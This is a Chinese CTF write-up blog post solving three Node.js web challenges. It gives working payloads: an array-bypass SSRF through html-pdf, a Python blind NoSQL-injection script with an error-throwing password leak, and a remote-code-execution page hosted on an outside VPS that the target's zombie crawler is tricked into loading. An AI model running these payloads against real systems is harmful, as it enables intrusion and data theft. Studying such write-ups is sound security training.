

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="sp4z">
  <meta name="keywords" content="">
  
  <title>祥云杯三道nodejs题目复现 - sp4z&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="祥云杯三道nodejs题目复现">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-09-28 12:18" pubdate>
        2021年9月28日 中午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      15
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">祥云杯三道nodejs题目复现</h1>
            
            <div class="markdown-body">
              <h1 id="Secrets-of-Admin"><a href="#Secrets-of-Admin" class="headerlink" title="Secrets of Admin"></a>Secrets of Admin</h1><h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><ol>
<li>终点是<code>/api/files/:id</code>的任意文件读取，filename来源于<code>DB.getFile</code>获取的files表filename字段值。files表已有一条username为superuser、filename为flag的记录，但是不可用。需要添加新纪录控制filename字段</li>
<li><code>/api/files</code>调用<code>DB.Create</code>方法向files表添加新记录，可以利用，但是要求本地访问。</li>
<li>利用html-pdf触发ssrf请求<code>/api/files</code>添加记录，然后访问<code>/api/files/:id</code>读取flag。虽然过滤了一些字符，但是由于没有做类型限制，可以传入数组绕过</li>
<li>访问<code>/api/file/checksum值</code>，读取flag</li>
</ol>
<p>/api/files</p>
<ol>
<li>判断是否为本地请求，不是本地请求返回401</li>
<li>DB.Create向files表的username、filename、checksum字段添加值</li>
</ol>
<p>/api/files/:id</p>
<ol>
<li>判断用户名是否为superuser，是的话就退出</li>
<li>DB.getFile从files表中获取filename字段，然后拼接在<code>../files/</code>后面，最后读取拼接后的文件名</li>
</ol>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210908205604921.png" srcset="/img/loading.gif" lazyload alt="image-20210908205604921"></p>
<p>getFile</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210908213831406.png" srcset="/img/loading.gif" lazyload alt="image-20210908213831406"></p>
<p>Create</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210908213846055.png" srcset="/img/loading.gif" lazyload alt="image-20210908213846055"></p>
<p>/admin</p>
<p>将html代码转换成pdf，过滤了<code>&lt; &gt; / script on</code>，可以用数组绕过，触发ssrf</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210908210805906.png" srcset="/img/loading.gif" lazyload alt="image-20210908210805906"></p>
<p>files表的结构</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210908215028738.png" srcset="/img/loading.gif" lazyload alt="image-20210908215028738"></p>
<h2 id="过程"><a href="#过程" class="headerlink" title="过程"></a>过程</h2><p>用硬编码的用户密码登录</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">admin</span>:e<span class="hljs-number">365655</span>e<span class="hljs-number">013</span>ce<span class="hljs-number">7</span>fdbdbf<span class="hljs-number">8</span>f<span class="hljs-number">27</span>b<span class="hljs-number">418</span>c<span class="hljs-number">8</span>fe<span class="hljs-number">6</span>dc<span class="hljs-number">9354</span>dc<span class="hljs-number">4</span>c<span class="hljs-number">0328</span>fa<span class="hljs-number">02</span>b<span class="hljs-number">0</span>ea<span class="hljs-number">547659645</span><br></code></pre></td></tr></table></figure>

<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210909091612485.png" srcset="/img/loading.gif" lazyload alt="image-20210909091612485"></p>
<p>请求</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dts">content[]=<span class="hljs-params">&lt;img src=&quot;http://<span class="hljs-number">127.0</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span>:<span class="hljs-number">8888</span>/api/files?username=admin<span class="hljs-variable">&amp;filename</span>=./flag<span class="hljs-variable">&amp;checksum</span>=<span class="hljs-number">123</span>&quot;&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210909091445062.png" srcset="/img/loading.gif" lazyload alt="image-20210909091445062"></p>
<p>访问</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">http</span>://<span class="hljs-number">88602</span>e<span class="hljs-number">43</span>-f<span class="hljs-number">55</span>f-<span class="hljs-number">44</span>ac-b<span class="hljs-number">03</span>c-<span class="hljs-number">5</span>c<span class="hljs-number">54356</span>a<span class="hljs-number">2</span>b<span class="hljs-number">1</span>e.node<span class="hljs-number">4</span>.buuoj.cn:<span class="hljs-number">81</span>/api/files/<span class="hljs-number">123</span><br></code></pre></td></tr></table></figure>

<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210909091529672.png" srcset="/img/loading.gif" lazyload alt="image-20210909091529672"></p>
<p>得到flag</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210909091408495.png" srcset="/img/loading.gif" lazyload alt="image-20210909091408495"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>学到的知识：</p>
<ol>
<li>js数组绕过内容过滤</li>
<li>html-pdf功能存在ssrf，利用标签触发</li>
</ol>
<h1 id="PackageManager"><a href="#PackageManager" class="headerlink" title="PackageManager"></a>PackageManager</h1><h2 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h2><p>从schema.ts中可知采用了mongodb</p>
<p>先看/routes/index.ts，主要有这几个路由：</p>
<ol>
<li>/login</li>
<li>/register</li>
<li>/auth</li>
</ol>
<p>/auth这里有sql注入，$where存在Nosql注入</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210915203317694.png" srcset="/img/loading.gif" lazyload alt="image-20210915203317694"></p>
<p>再看/routes/package.ts中的路由：</p>
<ol>
<li>/       判断用户名是否为testuser</li>
<li>/list     查找包的名称，获取GET参数search</li>
<li>/add    获取三个参数name、description、version，然后实例化Package类</li>
<li>/:id/edit  获取三个参数然后更新Package</li>
<li>/:id/delete  根据id删除</li>
<li>/submit  对输入的id进行检测，checkmd5Regex</li>
<li>/:id 查找admin的id</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> time<br><br><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;http://47.104.108.80:8888/auth&quot;</span><br><br>headers = &#123;<br>	<span class="hljs-string">&quot;Content-Type&quot;</span>: <span class="hljs-string">&quot;application/x-www-form-urlencoded&quot;</span>,<br>	<span class="hljs-string">&quot;Cookie&quot;</span>: <span class="hljs-string">&quot;session=s%3ADthecmgGxbSXlDRNMGa0ANBjvl9gp7Yx.uzQrxmhpWCBDXhnAMygWZBWmAvZ%2BQZXMCUFnc5OR8kU&quot;</span>,<br>&#125;<br><br>strings = <span class="hljs-string">&quot;abcdefghijklmnopqrstuvwxyz1234567890!@#$%^&amp;*()&quot;</span><br><br>res = <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(res)+<span class="hljs-number">1</span>,<span class="hljs-number">30</span>):<br>	<span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(res) == i-<span class="hljs-number">1</span>:<br>		<span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> strings:<br>			data = &#123;<br>				<span class="hljs-string">&quot;_csrf&quot;</span>:<span class="hljs-string">&quot;Z2kLXS3g-51i8xMnov2UGKbtP4n5ndrHgtWk&quot;</span>,<br>				<span class="hljs-string">&quot;token&quot;</span>:<span class="hljs-string">&#x27;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&quot;||this.password.substr(-&#123;&#125;)==&quot;&#123;&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(i,c + res),<br>			&#125;<br>			r = requests.post(url=url,headers=headers, data=data, allow_redirects=<span class="hljs-literal">False</span>)<br>			<span class="hljs-keyword">if</span> r.status_code == <span class="hljs-number">302</span>:<br>				res = c + res<br>				print(<span class="hljs-string">&quot;[+] &quot;</span> + res)<br><br>				<span class="hljs-keyword">break</span><br>			time.sleep(<span class="hljs-number">0.5</span>)<br>	<span class="hljs-keyword">else</span>:<br>		print(<span class="hljs-string">&quot;[-] Failed&quot;</span>)<br>		<span class="hljs-keyword">break</span><br><br><span class="hljs-comment"># 得到: b!@#$d5dh47jyfz#098crw*w</span><br></code></pre></td></tr></table></figure>



<h2 id="过程-1"><a href="#过程-1" class="headerlink" title="过程"></a>过程</h2><p>payload</p>
<figure class="highlight nsis"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nsis">e10adc3949ba59abbe56e057f20f883e<span class="hljs-string">&quot; || (()=&gt;&#123;throw Error(this.password)&#125;)() == &quot;</span><span class="hljs-literal">admin</span> <br></code></pre></td></tr></table></figure>

<p>拼接后完整的payload，分析可以知道， || 前面不管，后面会直接把admin密码的错误异常抛出，就会直接抛出密码，登录即可得到flag</p>
<figure class="highlight coffeescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs coffeescript"><span class="hljs-built_in">this</span>.username == <span class="hljs-string">&quot;admin&quot;</span> &amp;&amp; hex_md5(<span class="hljs-built_in">this</span>.password) ==<span class="hljs-string">&quot; e10adc3949ba59abbe56e057f20f883e&quot;</span> || (<span class="hljs-function"><span class="hljs-params">()</span>=&gt;</span>&#123;<span class="hljs-keyword">throw</span> <span class="hljs-built_in">Error</span>(<span class="hljs-built_in">this</span>.password)&#125;)() == <span class="hljs-string">&quot;admin &quot;</span><br></code></pre></td></tr></table></figure>

<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210916152932626.png" srcset="/img/loading.gif" lazyload alt="image-20210916152932626"></p>
<p>登录进去得到flag</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210916153136634.png" srcset="/img/loading.gif" lazyload alt="image-20210916153136634"></p>
<p>还可以使用盲注的方法</p>
<h2 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h2><ol>
<li>Nosql注入</li>
</ol>
<h1 id="crawler-z"><a href="#crawler-z" class="headerlink" title="crawler_z"></a>crawler_z</h1><h2 id="分析-2"><a href="#分析-2" class="headerlink" title="分析"></a>分析</h2><p>注册用户后登录，发现可以输入Bucket</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210910082034316.png" srcset="/img/loading.gif" lazyload alt="image-20210910082034316"></p>
<p>/user/bucket</p>
<p><code>/bucket</code>路由实例化了Crawler类，而Crawler类的构造方法中又实例化了zombie库，存在代码执行漏洞，只要访问的url可控就可以执行代码。</p>
<p>url来源于<code>user.bucket</code>，而且经过了正则判断，结尾必须是<code>oss-cn-beijing.ichunqiu.com</code></p>
<p>现在的目标就是把<code>user.bucket</code>改成我们的payload地址</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210910173126996.png" srcset="/img/loading.gif" lazyload alt="image-20210910173126996"></p>
<p>/user/profile</p>
<p>寻找<code>user.bucket</code>的来源，发现来源于<code>/user/profile</code>输入的bucket</p>
<p>跳转到<code>/user/veridy?token=$&#123;authToken&#125;</code>，authToken是随机生成的</p>
<p><code>checkBucket</code>函数监测内容是否为http或者https开头，内容是否包含<code>oss-cn-beijing.ichunqiu.com</code></p>
<p>如果输入的bucket不满足判断，就无法得到token，也就没办法修改bucket；但由于这里的update会保存输入的bucket，所以可以先输入一个正常的bucket来获取token，同时选择不跳转到<code>/user/verify</code>，然后输入恶意bucket再利用之前生成的token跳转到<code>/user/verify</code>，这样就成功保存了恶意bucket</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210910201730377.png" srcset="/img/loading.gif" lazyload alt="image-20210910201730377"></p>
<p>/user/verify</p>
<p><code>/verify</code>这里会对输入的token跟保存的token进行对比，一致的话就可以成功修改<code>user.bucket</code></p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210910175113213.png" srcset="/img/loading.gif" lazyload alt="image-20210910175113213"></p>
<h2 id="过程-2"><a href="#过程-2" class="headerlink" title="过程"></a>过程</h2><p>利用zombie库的代码注入漏洞，在vps上放一个payload.html，payload.html内容</p>
<figure class="highlight kotlin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs kotlin">&lt;script&gt;<br>a=<span class="hljs-keyword">this</span>.<span class="hljs-keyword">constructor</span>.<span class="hljs-keyword">constructor</span>.<span class="hljs-keyword">constructor</span>.<span class="hljs-keyword">constructor</span>(<span class="hljs-string">&#x27;return process&#x27;</span>)();b=a.mainModule.require(<span class="hljs-string">&#x27;child_process&#x27;</span>);c=b.execSync(<span class="hljs-string">&#x27;cat /flag&#x27;</span>).toString();document.write(c);<br>&lt;/script&gt;<br></code></pre></td></tr></table></figure>



<p>注册用户后登录，访问/user/profile输入Age后Update，然后burp抓包</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210910170524783.png" srcset="/img/loading.gif" lazyload alt="image-20210910170524783"></p>
<p>接下来发送两次数据包，第一次发送满足正则的bucket，获取token但是不跟随跳转</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210910170730664.png" srcset="/img/loading.gif" lazyload alt="image-20210910170730664"></p>
<p>第二次更新恶意bucket，修改bucket为</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span><span class="hljs-number">118.195</span>.<span class="hljs-number">166.138</span><span class="hljs-regexp">/payload.html#oss-cn-beijing.ichunqiu.com/</span><br></code></pre></td></tr></table></figure>

<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210910171201938.png" srcset="/img/loading.gif" lazyload alt="image-20210910171201938"></p>
<p>然后回到第一个数据包，选择Follow Direction，带上token访问进入</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210910171226965.png" srcset="/img/loading.gif" lazyload alt="image-20210910171226965"></p>
<p>访问/user/bucket得到flag</p>
<p><img src="%E7%A5%A5%E4%BA%91%E6%9D%AF%E4%B8%89%E9%81%93nodejs%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0.assets/image-20210910171805935.png" srcset="/img/loading.gif" lazyload alt="image-20210910171805935"></p>
<h2 id="总结-2"><a href="#总结-2" class="headerlink" title="总结"></a>总结</h2><ol>
<li>先满足正则获取token，但不跟随跳转，</li>
<li>输入恶意bucket</li>
<li>选择跳转，带上token访问，成功保存</li>
</ol>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/09/25/CVE-2021-3129%E5%88%86%E6%9E%90/">
                        <span class="hidden-mobile">CVE-2021-3129分析</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
